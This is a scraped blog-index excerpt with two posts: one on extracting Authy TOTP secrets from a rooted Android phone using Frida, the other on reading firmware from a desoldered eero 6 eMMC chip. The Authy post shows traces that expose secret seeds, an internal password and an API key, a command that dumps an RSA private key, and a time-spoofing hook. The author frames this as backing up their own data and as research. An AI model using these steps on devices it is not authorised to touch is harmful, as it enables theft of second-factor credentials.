\u0026#34;id\u0026#34;: \u0026#34;1720731300\u0026#34;, \u0026#34;isNew\u0026#34;: false, \u0026#34;name\u0026#34;: \u0026#34;ACME Co: jdoe@example.com\u0026#34; }] The decryptedSecret value is your TOTP plaintext secret. To confirm this is actually valid, you could use something like a TOTP Token generator (only for sample accounts) to see if it matches the code on your Authy app.\nFor anything sensitive, I would instead use an offline script that\u0026rsquo;s open source.\nKinda like the one in this post :)\nAuthy TOTP secret extract tool I\u0026rsquo;ve made a simple tool that is capable of extracting TOTP secrets from the Android Authy app. You will need a rooted device and a Frida server running. There may be other ways (without root access), like patching the Android app, but this was not explored here.\nAnyway the script does the following:\ntries to connect to a USB device via Frida module spawns com.authy.authy and then attaches to the process runs a Frida script to read the com.authy.storage.tokens.authenticator.xml file parses the file contents and extracts relevant TOTP info generates QR codes based on extracted info and prints it Requirements You need to install the following Python modules:\npip3 install frida pyotp qrcode Download It is available on my GitHub page here.\nAlternative Instead of using the script above or setting up a Frida server. One easier way (if you have a rooted device) is to install the Aegis app and then import the above XML file which they do support.\nThe next few sections go into details of how Authy generates OTPs for URL parameters in each of their API endpoints. As well as, some Java method tracing with frida-trace.\nRuntime fun with Frida Now that I have what I need to create backup offline, I could stop right there. However, I wanted to explore the .apk a bit, and also figure out how the OTPs tokens are generated. These are supplied in various HTTP requests, after account registration.\nSenstive Java operations WithSecureLabs have a great collection of Frida scripts on their GitHub page. I used several such as tracer-keystore.js, tracer-secretkeyfactory.js, and others.\nhook secure keystore of android (https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-keystore.js) and https://labs.withsecure.com/publications/how-secure-is-your-android-keystore-authentication ✘ naz@Nazs-MacBook-Air ~/Mobile/Android/Frida $ frida -U -l tracer-keystore.js -f com.authy.authy ____ / _ | Frida 16.1.4 - A world-class dynamic instrumentation toolkit | (_| | \u0026gt; _ | Commands: /_/ |_| help -\u0026gt; Displays the help system . . . . object? -\u0026gt; Display information about \u0026#39;object\u0026#39; . . . . exit/quit -\u0026gt; Exit . . . . . . . . More info at https://frida.re/docs/home/ . . . . . . . . Connected to Pixel 3a (id=9C6AY1MMQX) Spawning `com.authy.authy`... KeyStore hooks loaded! Spawned `com.authy.authy`. Resuming main thread! [Pixel 3a::com.authy.authy ]-\u0026gt; [Keystore.getInstance()]: type: BKS [Keystore.load(InputStream, char[])]: keystoreType: BKS, password: \u0026#39;(null)\u0026#39;, inputSteam: null [Keystore.getInstance()]: type: AndroidKeyStore [Keystore.load(LoadStoreParameter)]: keystoreType: AndroidKeyStore, param: null [Keystore.getInstance()]: type: AndroidKeyStore [Keystore.load(LoadStoreParameter)]: keystoreType: AndroidKeyStore, param: null [Keystore.getInstance()]: type: BKS [Keystore.load(LoadStoreParameter)]: keystoreType: BKS, param: null [Keystore.getInstance()]: type: BKS [Keystore.load(InputStream, char[])]: keystoreType: BKS, password: \u0026#39;changeit\u0026#39;, inputSteam: android.content.res.AssetManager$AssetInputStream@ec77830 [Keystore.getInstance()]: type: BKS [Keystore.load(InputStream, char[])]: keystoreType: BKS, password: \u0026#39;(null)\u0026#39;, inputSteam: null [Keystore.getInstance()]: type: BKS [Keystore.load(LoadStoreParameter)]: keystoreType: BKS, param: null [Keystore.getInstance()]: type: AndroidKeyStore [Keystore.load(LoadStoreParameter)]: keystoreType: AndroidKeyStore, param: null [Keystore.getKey()]: alias: sig1810030805, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enc1810030805, password: \u0026#39;(null)\u0026#39; [Keystore.getInstance()]: type: AndroidKeyStore [Keystore.load(LoadStoreParameter)]: keystoreType: AndroidKeyStore, param: null [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Pixel 3a::com.authy.authy ]-\u0026gt; [Pixel 3a::com.authy.authy ]-\u0026gt; exit Nothing too interesting, let\u0026rsquo;s move on to the tracer-secretkeyfactory.js script.\nnaz@Nazs-MacBook-Air ~/Mobile/Android/Frida $ frida -U -l tracer-secretkeyfactory.js -f com.authy.authy ____ / _ | Frida 16.1.4 - A world-class dynamic instrumentation toolkit | (_| | \u0026gt; _ | Commands: /_/ |_| help -\u0026gt; Displays the help system . . . . object? -\u0026gt; Display information about \u0026#39;object\u0026#39; . . . . exit/quit -\u0026gt; Exit . . . . . . . . More info at https://frida.re/docs/home/ . . . . . . . . Connected to Pixel 3a (id=9C6AY1MMQX) Spawning `com.authy.authy`... SecretKeyFactory hooks loaded! Spawned `com.authy.authy`. Resuming main thread! [Pixel 3a::com.authy.authy ]-\u0026gt; [PBEKeySpec.PBEKeySpec3()]: pass: %sD=#4utHy.\u0026gt;{dwp\u0026amp;@ iter: 100 keyLength: 256 salt: Offset 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 00000000 C2 48 C6 29 AF 1F E0 A8 C4 6B 95 66 80 64 C1 D2 .H.).....k.f.d.. 00000010 95 2A 9E 91 D2 07 BC 0C C3 C5 D5 84 C2 F7 55 3A .*............U: [PBEKeySpec.PBEKeySpec3()]: pass: %sD=#4utHy.\u0026gt;{dwp\u0026amp;@ iter: 100 keyLength: 256 ... The output has been truncated to save space. But a pass field with the value of %sD=#4utHy.\u0026gt;{dwp\u0026amp;@ is present. If you look at it closer, you\u0026rsquo;ll notice 4utHy almost resembles the string Authy. I\u0026rsquo;m not quite sure how it\u0026rsquo;s used or for what purpose.\nTracing Java Classes I used the jadx-gui Java decompiler, to inspect the app, luckily it wasn\u0026rsquo;t too heavily obfuscated. I could find classes relating to functions or classes that have specific keywords. Keywords from intercepted traffic.\nOther keywords like opt1, secret, backup_key and others can be found. These were also in the HTTP requests intercepted eariler. The Java package called com.authy.authy.api.requestInterceptors is responsible for constructing requests that are sent to backend servers. The class CompleteParamsRequestInterceptor makes up most of the package.\nHere\u0026rsquo;s what the code looks like within Jadx-gui:\nI noticed that the com.authy.authy.models.MasterApp class made references to com.authy.authy.models.AuthyApp, which contained functions such as getOtp(), isConfigured(), validateAndLock() and others. I was mainly curious in the getOtp() function because I wanted to know how it gets generated.\nstatic api_key value The api_key keyword can be found in a class called com.authy.authy.api.AuthyAPI. It appears to be statically set to 37b312a3d682b823c439522e1fd31c82. This could change between app versions. Although, they have been using this since older versions.\nfrida-trace java classes With some key class names, I then used frida-trace with the -j option to search for any usage of the com.authy.authy.models.AuthyApp class during app runtime. The -f parameter is what starts or spawns the app.\nnaz@Nazs-MacBook-Air ~/Mobile/Android/Frida/lol2 $ frida-trace -U -j \u0026#39;com.authy.authy.models.AuthyApp!*\u0026#39; -f com.authy.authy Instrumenting... AuthyApp.$init: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/_init.js\u0026#34; AuthyApp.addExtraDataBeforeSave: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/addExtraDataBeforeSave.js\u0026#34; AuthyApp.decrypt: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/decrypt.js\u0026#34; AuthyApp.getConfigId: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getConfigId.js\u0026#34; AuthyApp.getInternalId: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getInternalId.js\u0026#34; AuthyApp.getLogoImage: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getLogoImage.js\u0026#34; AuthyApp.getMenuImage: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getMenuImage.js\u0026#34; AuthyApp.getOtp: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getOtp.js\u0026#34; AuthyApp.getSecretKey: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getSecretKey.js\u0026#34; AuthyApp.getTokenIdLabel: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getTokenIdLabel.js\u0026#34; AuthyApp.getTokenLabel: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getTokenLabel.js\u0026#34; AuthyApp.getUniqueId: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getUniqueId.js\u0026#34; AuthyApp.isConfigured: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/isConfigured.js\u0026#34; AuthyApp.setSecretKey: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/setSecretKey.js\u0026#34; AuthyApp.toBluetoothInfo: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/toBluetoothInfo.js\u0026#34; AuthyApp.updateConfig: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/updateConfig.js\u0026#34; AuthyApp.validateAndLock: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/validateAndLock.js\u0026#34; Started tracing 17 functions. Press Ctrl+C to stop. /* TID 0x1763 */ 578 ms AuthyApp.$init() /* TID 0x174a */ 811 ms AuthyApp.isConfigured() 823 ms \u0026lt;= true 844 ms AuthyApp.getSecretKey() 846 ms \u0026lt;= \u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34; /* TID 0x17e3 */ 1020 ms AuthyApp.getSecretKey() 1025 ms \u0026lt;= \u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34; /* TID 0x183e */ 1420 ms AuthyApp.getSecretKey() 1423 ms \u0026lt;= \u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34; /* TID 0x1721 */ 1520 ms AuthyApp.getSecretKey() 1524 ms \u0026lt;= \u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34; 1642 ms AuthyApp.getSecretKey() 1644 ms \u0026lt;= \u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34; 1764 ms AuthyApp.getSecretKey() 1767 ms \u0026lt;= \u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34; /* TID 0x174a */ 1772 ms AuthyApp.isConfigured() 1777 ms \u0026lt;= true The AuthyApp.getSecretKey() method is called multiple times, when the app starts. The value returned is 227aa6ce3689bfdbdc4afd0e5376965a. I later realised this is the secret seed which is used for generating the OTPs tokens.\nDoing the same thing but on a different class com.authy.authy.models.otp.OtpGenerator shows that the above seed is used as input as the first paramater for a function called OtpGenerator.generateConsecutiveOTPS.\nHere\u0026rsquo;s the calls:\nnaz@Nazs-MacBook-Air ~/Mobile/Android/Frida/lol2 $ frida-trace -U -j \u0026#39;com.authy.authy.models.otp.OtpGenerator!*\u0026#39; -f com.authy.authy Instrumenting... OtpGenerator.$init: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/_init.js\u0026#34; OtpGenerator.getInstance: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/getInstance.js\u0026#34; OtpGenerator.generateConsecutiveOTPS: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/generateConsecutiveOTPS.js\u0026#34; OtpGenerator.generateOTP: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/generateOTP.js\u0026#34; OtpGenerator.getMovingFactor: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/getMovingFactor.js\u0026#34; OtpGenerator.hashToHexString: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/hashToHexString.js\u0026#34; OtpGenerator.hmac_sha1: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/hmac_sha1.js\u0026#34; Started tracing 7 functions. Press Ctrl+C to stop. /* TID 0x5004 */ 860 ms OtpGenerator.generateConsecutiveOTPS(\u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34;, 3, 7) 860 ms | OtpGenerator.generateOTP([56,99,50,100,56,101,49,55,49,57,101,100,100,50,57,49,54,48,49,55,102,98,101,99,56,48,49,55,57,55,49,55], [49,55,50,48,55,50,54,52,49], 7) 862 ms | | OtpGenerator.hmac_sha1([56,99,50,100,56,101,49,55,49,57,101,100,100,50,57,49,54,48,49,55,102,98,101,99,56,48,49,55,57,55,49,55], [49,55,50,48,55,50,54,52,49]) 866 ms | | \u0026lt;= [-64,-19,-98,-36,56,18,-28,-119,-51,93,10,-43,32,-95,-23,120,78,-10,125,-11] 867 ms | | OtpGenerator.hashToHexString([-64,-19,-98,-36,56,18,-28,-119,-51,93,10,-43,32,-95,-23,120,78,-10,125,-11]) 867 ms | | \u0026lt;= \u0026#34;c0ed9edc3812e489cd5d0ad520a1e9784ef67df5\u0026#34; 867 ms | \u0026lt;= \u0026#34;9313298\u0026#34; 867 ms | OtpGenerator.generateOTP([56,99,50,100,56,101,49,55,49,57,101,100,100,50,57,49,54,48,49,55,102,98,101,99,56,48,49,55,57,55,49,55], [49,55,50,48,55,50,54,52,50], 7) 868 ms | | OtpGenerator.hmac_sha1([56,99,50,100,56,101,49,55,49,57,101,100,100,50,57,49,54,48,49,55,102,98,101,99,56,48,49,55,57,55,49,55], [49,55,50,48,55,50,54,52,50]) 869 ms | | \u0026lt;= [57,61,104,-108,31,-110,111,-29,69,80,-32,17,39,-50,-24,-40,70,82,62,-2] 869 ms | | OtpGenerator.hashToHexString([57,61,104,-108,31,-110,111,-29,69,80,-32,17,39,-50,-24,-40,70,82,62,-2]) 870 ms | | \u0026lt;= \u0026#34;393d68941f926fe34550e01127cee8d846523efe\u0026#34; 870 ms | \u0026lt;= \u0026#34;8310670\u0026#34; 870 ms | OtpGenerator.generateOTP([56,99,50,100,56,101,49,55,49,57,101,100,100,50,57,49,54,48,49,55,102,98,101,99,56,48,49,55,57,55,49,55], [49,55,50,48,55,50,54,52,51], 7) 872 ms | | OtpGenerator.hmac_sha1([56,99,50,100,56,101,49,55,49,57,101,100,100,50,57,49,54,48,49,55,102,98,101,99,56,48,49,55,57,55,49,55], [49,55,50,48,55,50,54,52,51]) 873 ms | | \u0026lt;= [47,39,-65,43,-21,-27,-114,-30,-7,-114,-79,-93,35,119,-64,-46,121,113,-82,34] 874 ms | | OtpGenerator.hashToHexString([47,39,-65,43,-21,-27,-114,-30,-7,-114,-79,-93,35,119,-64,-46,121,113,-82,34]) 875 ms | | \u0026lt;= \u0026#34;2f27bf2bebe58ee2f98eb1a32377c0d27971ae22\u0026#34; 875 ms | \u0026lt;= \u0026#34;1677502\u0026#34; 878 ms \u0026lt;= \u0026#34;\u0026lt;instance: java.util.ArrayList\u0026gt;\u0026#34; As shown above, three calls to OtpGenerator.generateOTP are made which return the following OTP tokens: 9313298, 8310670, 1677502. The caller of this function OtpGenerator.generateConsecutiveOTPS, can also be seen taking three input parameters which are:\n227aa6ce3689bfdbdc4afd0e5376965a (device secret seed) 3 (number of OTP tokens) 7 (number of OTP digits) The reason why all three OTP tokens are different is because the app also adds a few milliseconds to the initial time retireved from the system time. Back in 2021, a researcher reverse engineered the OTP generation of Authy, which is available here.\nA brief look at the com.authy.authy.models.movingFactor.MovingFactor class:\nnaz@Nazs-MacBook-Air ~/Mobile/Android/Frida/lol2 $ frida-trace -U -j \u0026#39;com.authy.authy.models.movingFactor.MovingFactor*!*\u0026#39; -f com.authy.authy Instrumenting... MovingFactor$Corrector.$init: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/_init.js\u0026#34; MovingFactor$Corrector.getLocalTime: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/getLocalTime.js\u0026#34; MovingFactor$Corrector.getTimeInServerUnits: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/getTimeInServerUnits.js\u0026#34; MovingFactor$Corrector.getTimeInServerUnits$default: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/getTimeInServerUnits_default.js\u0026#34; MovingFactor$Corrector.getCurrentTime: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/getCurrentTime.js\u0026#34; MovingFactor$Corrector.getCurrentTimeInServerUnits: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/getCurrentTimeInServerUnits.js\u0026#34; MovingFactor$Corrector.getMovingFactor: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/getMovingFactor.js\u0026#34; MovingFactor$Corrector.isTimeCorrectionSignificant: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/isTimeCorrectionSignificant.js\u0026#34; MovingFactor$Corrector.updateMovingFactorCorrection: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/updateMovingFactorCorrection.js\u0026#34; MovingFactor.$init: Loaded handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor/_init.js\u0026#34; MovingFactor.access$getMovingFactorCorrection$cp: Loaded handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor/access_getMovingFactorCorrection_cp.js\u0026#34; MovingFactor.access$setMovingFactorCorrection$cp: Loaded handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor/access_setMovingFactorCorrection_cp.js\u0026#34; Started tracing 12 functions. Press Ctrl+C to stop. /* TID 0x60c7 */ 426 ms MovingFactor$Corrector.$init(null) /* TID 0x6118 */ 1193 ms MovingFactor$Corrector.updateMovingFactorCorrection(\u0026#34;1720728191000\u0026#34;) 1193 ms MovingFactor$Corrector.getMovingFactor() 1193 ms \u0026lt;= \u0026#34;-754\u0026#34; 1283 ms MovingFactor$Corrector.updateMovingFactorCorrection(\u0026#34;1720728191000\u0026#34;) 1284 ms MovingFactor$Corrector.getMovingFactor() 1284 ms \u0026lt;= \u0026#34;-844\u0026#34; /* TID 0x60b1 */ 65472 ms MovingFactor$Corrector.getCurrentTime() 65472 ms \u0026lt;= \u0026#34;1720728255189\u0026#34; 65475 ms MovingFactor$Corrector.getCurrentTime(\u0026#34;\u0026lt;instance: java.util.concurrent.TimeUnit, $className: java.util.concurrent.TimeUnit$4\u0026gt;\u0026#34;) 65477 ms \u0026lt;= \u0026#34;1720728255\u0026#34; 81078 ms MovingFactor$Corrector.getCurrentTime(\u0026#34;\u0026lt;instance: java.util.concurrent.TimeUnit, $className: java.util.concurrent.TimeUnit$4\u0026gt;\u0026#34;) 81079 ms \u0026lt;= \u0026#34;1720728270\u0026#34; 81083 ms MovingFactor$Corrector.getCurrentTime() 81083 ms \u0026lt;= \u0026#34;1720728270800\u0026#34; 112055 ms MovingFactor$Corrector.getCurrentTime(\u0026#34;\u0026lt;instance: java.util.concurrent.TimeUnit, $className: java.util.concurrent.TimeUnit$4\u0026gt;\u0026#34;) 112056 ms \u0026lt;= \u0026#34;1720728301\u0026#34; 112058 ms MovingFactor$Corrector.getCurrentTime() 112059 ms \u0026lt;= \u0026#34;1720728301775\u0026#34; Dumping RSA private key Dumps device/account RSA private key and secret seed, amoung other calls:\nfrida-trace -U -f com.authy.authy -j \u0026#39;com.authy.authy.util.CryptoHelper*!*/i\u0026#39; Changing device time I thought I would try messing about with the device time so I could see how the app would handle it. For a brief moment the TOTP tokens were the same every 30 seconds. But after a bit the app was smart enough to check time syncs with a backend server and regenerate token from that time instead.\nHere\u0026rsquo;s a Frida script I found that changes the device time to Thu Dec 31 2020 16:00:00:\nJava.perform(() =\u0026gt; { // This function will be called every time System.currentTimeMillis() is called function hook() { // Return the Unix timestamp for \u0026#34;Thu Dec 31 2020 16:00:00\u0026#34; return 1609459200000; } // Create a Frida hook on the System.currentTimeMillis() method var System = Java.use(\u0026#39;java.lang.System\u0026#39;); System.currentTimeMillis.implementation = hook; }); You\u0026rsquo;ll notice your Authy TOTP tokens remain the same, at least for a bit.\nSummary Authy makes it annoying to create offline backups, forcing users to only allow uploading to their servers. However, with a bit of trial and error we can export our 2FA secrets with the help of Frida and a rooted Android device.\nBut before you delete your Authy account.\nThere have been some reports from users that when you delete your Authy account. This will invalidate all 2FA token that use it as a backend. This includes Twitch, SendGrid, xxxx, and others. When you delete your account, there\u0026rsquo;s a 1 month delay. Read source.\nThis would make sense, however, it\u0026rsquo;s not clearly documented to users.\n","permalink":"https://markuta.com/export-authy-backups/","title":"Creating offline Authy backups"},{"categories":null,"contents":"This is second part of the Hacking Amazon\u0026rsquo;s eero 6 device, which covers reading and extracting firmware data directly from a eMMC flash chip. This is after the chip had been desoldered (not by me) off the device. I also share the equipment I bought during this project, including what didn\u0026rsquo;t work and what did.\nYou can skip to this section on modifying a BGA159 chip reader.\nThe firmware on the eMMC at the time version v7.1.1-16 released on X. This most likely has changed by now but it should still represent the core layout and structure of a device\u0026rsquo;s filesystem.\nThe first part of the blog can be found: https://markuta.com/eero-6-hacking-part-1/\nWhat this blog is about? Non-destructive Before committing to removing the eMMC flash chip from the device. I tried a few non-destructive techniques . This obviously did not work for me. But here were a few things I\u0026rsquo;ve tried:\nrecovery mode boot interrupting boot via UART tracing lines around eMMC faulting device boot-up analysing device test points I had no luck with the above, and it was at this point where I decided it was time to desolder the chip, while at the same time hoping the firmware was not encrypted.\nChip removal I was tempted to buy a hot air station, but a decent one costs about £200 I decided to take the device to a mobile repair shop, where they desoldered it for £20 so now i\u0026rsquo;ve got a eMMC BGA153 chip but no easy way to read it tried a few super cheap ways with the tools I had on hand (didn\u0026rsquo;t work out) ended up buying a cheap BGA153 adapter + some other devices eMMC and SD interfaces In a nutshell, microSD, SD, MMC, and eMMC all work very similarly but have slight differences. eMMC stands for Embedded MultiMedia Card, and is made up of the NAND flash storage, as well as the flash controller, which sits between the host processor. A technical overview can be found here.\nYou should also read this excellent article by (riverloopsecurity) about their eMMC research, which includes firmware extraction. Or this Blackhat 2017 talk by Amir Etemadieh.\nA few failed attempts I have a theory that the reason most attempts failed was because I was using the eMMC in 1-bit mode, meaning only one data pin is connected. But it could also be the adapter I was using did not support this mode (very doubtful). The other, more realistic reason, could be my soldering contact points, and/or missing resistors.\ntracing lines The were several trace lines between the eMMC chip and the main CPU. One of the things I tried was scratching pieces of PCB to reveal the copper lines. And then try solder a very fine copper wire to see I could use a logic analyser. This didn\u0026rsquo;t work as it was difficult to identify a CLK signal and/or other signals.\nNote: I didn\u0026rsquo;t have a photo before the eMMC was removed.\ndead bugging used 0.1mm copper wire with a thin layer of enamel used a breakout board with white tack for the chip sacrifice a microSD adapter probe tool The idea behind the tool is pretty good, the problem I found was that the application is best suited for microSD card recovery and bigger PCBs. Instead of fine BGA pads. The test probes (although they were almost like needles) would slip off the pad and are quite awkward to work with.\neMMC to microSD adapter I also tried using a cheap microSD to SD adapter, which was then plugged into a microSD reader. I used three SD card readers, a transcend SD USB adapter, a UGreen multi-tool USB-C adapter, and an old laptop with a SD card slot, all of which failed.\nlow-powered eMMC to SD adapter I really thought this device would work. But it didn\u0026rsquo;t. I thought it\u0026rsquo;s likely to do with my soldering, although I did triple check the contacts points before trying to read the chip. Apparently, others have also had issues e.g. link\nShopping on Aliexpress I began to lose patience, since I wasn\u0026rsquo;t getting anywhere with a \u0026ldquo;hacky\u0026rdquo; solutions. So I decided to go on Aliexpress and buy a BGA153 adapter to read the eMMC chip, without needing to manually solder wires to tiny BGA pads.\nAliexpress basically has anything you want when it comes to electronics. From NAND flash chips to Wi-Fi routers, JTAG/SPI programmers, and even LTE base stations, and a much more. Orders to the UK normally take around 2-weeks to arrive.\nI searched for keywords like eMMC reader, eMMC to SD adapter, BGA153 adapter and others to see what\u0026rsquo;s available. Here were some of the results:\nAnd yes somebody actually paid for the \u0026ldquo;reasonably\u0026rdquo; priced £1,007.18 one. Most of the devices were very expensive and I wasn\u0026rsquo;t prepared to spend that much on a single project. The blog post mentioned earlier used a AllSocket adapter which came with a SD interface, however, costs upwards of £90.\nI purchased the cheapest (£35) eMMC BGA153 adapter that I could find. This also meant I had to purchase another device that converts signals into either a USB or a SD interface, because all the cheap adapters didn\u0026rsquo;t have a proper interface other than pins.\nMKS eMMC adapter I could try to solder these pins to a regular microSD adapter, which I have already tried. However, I did not want to go down that route again so I decided to buy a device to talk to the eMMC chip, which then talk to my system.\nThe MKS eMMC adapter device is typically used in 3D-printers for upgrading firmware. It supports both a microSD slot and 20-pin eMMC extension module header with a USB 3.0 interface.\nYou can find them almost on anywhere eBay, Amazon, Aliexpress, etc.\nPutting it together Identifying pinout Annoyingly, I couldn\u0026rsquo;t find a pinout table for the BGA153 adapter showing what each pin is connected to. I guess it\u0026rsquo;s because the adapter is mostly used with devices such as RT809H or TL866, where you just plug it in, and let the software handle the rest.\nTo start, I had to get a datasheet document for the Kingston BGA153 eMMC chip, and then I compared it with the layout on the adapter. Nothing too difficult here, although I did need to order some very fine multimeter probes.\nThe middle square pins are for the Flash I/O and memory power supply. And the outer square pins are for the Memory controller core and MMC I/O, as well as power supply. The Flash I/O memory uses Vcc and Vss, while the Memory controller uses Vccq and Vssq.\nI needed to unscrew the top plastic piece so I can easily reach the pads on the PCB with my multimeter probes. I then set it to continuity mode and touched each pin until I heard a beep, while comparing with the above chip pinout.\nHere is the pin out for those those that are interested:\nAs you can see in the left part of the image, the pins match up exactly to the one from the eMMC flash reference document. I was confident that this should work, but there\u0026rsquo;s always room for error.\nNote: Trying to read the eMMC using 1-bit mode (DAT0 only) did NOT work for me.\nTo communicate with the chip, the following pins must be connected - the command and clock pins CMD and CLK, data pins - DAT0, DAT1, DAT2, DAT3, power pins - Vcc, Vccq, and ground - Vss and Vssq. This allowed me to read and write to the eMMC in 4-bit transfer mode.\nSoldering jumper wires As mentioned above I found a cheap MKS EMMC Adapter device for about £5 on eBay. It supports both a microSD slot and 20-pin eMMC extension module, and also uses a USB 3.0 interface. All I needed to do is solder the wires to a eMMC module pins.\nThe 20-pin layout for the eMMC module was found here:\nPin# Assignment Pin# Assignment 1 EMMC_D0 2 EMMC_D1 3 EMMC_D2 4 EMMC_D3 5 EMMC_D4 6 EMMC_D5 7 EMMC_D6 8 EMMC_D7 9 EMMC_STRB 10 GND 11 EMMC_CMD 12 EMMC_CLK 13 N/C 14 GND 15 N/C 16 VCC_IO 17 eMMC_RST 18 VCC3V3 19 GND 20 GND Here\u0026rsquo;s the ugly but finished product. Note: The pin numbers are numbered but they are not visible from the following photo. It would\u0026rsquo;ve been nice if there was a breakout slot.\nNow all I needed to do is solder the wires to the BGA153 adapter.\nReading the chip Here\u0026rsquo;s a photo of everything connected and what it actually looked like.\nThe BGA153 adapter (with the eMMC chip inside) is connected to MKS EMMC Adapter using jumper wires. It is then connected to my main system running Windows with VMware software, where I have a dedicated Linux virtual machine for doing embedded device stuff. Once plugged-in I just needed to pass-through the USB device to the VM.\nI used dmesg with -W to monitor changes. It was at this point where I got super excited.\nnaz@looper:~$ sudo dmesg -W [sudo] password for naz: [ 1880.570293] usb 3-2: new high-speed USB device number 5 using xhci_hcd [ 1880.948845] usb 3-2: New USB device found, idVendor=05e3, idProduct=0747, bcdDevice= 8.19 [ 1880.948853] usb 3-2: New USB device strings: Mfr=3, Product=4, SerialNumber=5 [ 1880.948856] usb 3-2: Product: USB Storage [ 1880.948858] usb 3-2: Manufacturer: Generic [ 1880.948861] usb 3-2: SerialNumber: 000000000819 [ 1880.977681] usb-storage 3-2:1.0: USB Mass Storage device detected [ 1880.981082] scsi host33: usb-storage 3-2:1.0 [ 1880.981818] usbcore: registered new interface driver usb-storage [ 1880.986104] usbcore: registered new interface driver uas [ 1882.006464] scsi 33:0:0:0: Direct-Access Generic STORAGE DEVICE 0819 PQ: 0 